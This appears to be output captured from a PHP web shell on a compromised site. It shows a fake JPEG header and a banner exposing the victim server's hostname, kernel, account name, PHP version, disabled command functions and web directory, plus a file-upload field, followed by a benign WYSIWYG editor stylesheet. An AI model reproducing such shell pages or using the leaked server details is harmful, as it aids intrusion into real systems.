ÿØÿà JFIF ` ` ÿþ
Server : Apache/2 System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 User : benhviencoc7 ( 1008) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname Directory : /home/benhviencoc7/public_html/data/javascripts/editor/styles/ |
Upload File : |
/* WYSIWYG EDITOR */ /* Toolbar */ .toolbar1 { border: 1px solid #DFDFDF; height: 26px; background-image: url(../icons/background_silver.jpg); border-bottom: 0px; } .toolbar2 { border: 1px solid #DFDFDF; height: 24px; background-image: url(../icons/background_silver.jpg); border-bottom: 0px; } /* Command Buttons */ .button { width: 20px; height: 20px; border: 0px solid transparent; margin: 1px; padding: 0px; background: transparent; } .buttonOver { width: 20px; height: 20px; border: 1px solid #DFDFDF; margin: 0; padding: 0px; } /* Font Type and Size Drop Down */ /* .dropdown { background-color: #FFFFFF; border: 1px solid #DFDFDF; height: 140px; overflow: auto; padding: 1px; } */ button.mouseOver { background-color: #EEEEEE; border: 1px solid #CCCCCC; padding: 3px; cursor: default; text-align: left;} button.mouseOut { background-color: #FFFFFF; border: 1px solid #FFFFFF; padding: 3px; cursor: default; text-align: left;} /* CREATE TABLE POPUP */ /* Select Border Width/Type */ .on { background-color: #EEEEEE; border: 1px solid #CCCCCC; padding: 6px; width: 140px; cursor: default; height: 5px;} .off { background-color: #FFFFFF; border: 1px solid #FFFFFF; padding: 6px; width: 140px; cursor: default; height: 5px;} /* Select Shading/Border Color */ .selectColorTable { border: 1px solid #7E7E81; background-color: #F7F7F7; padding: 1px; } .selectColorBorder { border: 1px solid #F7F7F7; } .selectColorOn { border: 1px solid #999999; background-color: #CCCCCC; } .selectColorOff { border: 1px solid #F7F7F7; background-color: #F7F7F7; } .selectColorBox { border: 1px solid #FFFFFF; font-size: 1px; height: 13px; width: 13px; } /** * POPUP CONTAINER STYLES */ #popupMask { position: absolute; z-index: 200; top: 0px; left: 0px; width: 100%; height: 100%; opacity: .4; filter: alpha(opacity=40); /* this hack is so it works in IE * I find setting the color in the css gives me more flexibility * than the PNG solution. */ background-color:transparent !important; background-color: #333333; /* this hack is for opera support * you can uncomment the background-image if you don't care about opera. * this gives you the flexibility to use any bg color that you want, instead of the png */ background-image/**/: url("maskBG.png") !important; // For browsers Moz, Opera, etc. background-image:none; background-repeat: repeat; display:none; } #popupContainer { position: absolute; z-index: 201; top: 0px; left: 0px; display:none; padding: 0px; } #popupInner { border: 2px solid #000000; background-color: #ffffff; } #popupFrame { margin: 0px; width: 100%; height: 100%; position: relative; z-index: 202; } #popupTitleBar { background-color: #486CAE; color: #ffffff; font-weight: bold; height: 1.3em; padding: 5px; border-bottom: 2px solid #000000; border-top: 1px solid #78A3F2; border-left: 1px solid #78A3F2; border-right: 1px solid #204095; position: relative; z-index: 203; } #popupTitle { float:left; font-size: 1.1em; } #popupControls { float: right; cursor: pointer; cursor: hand; }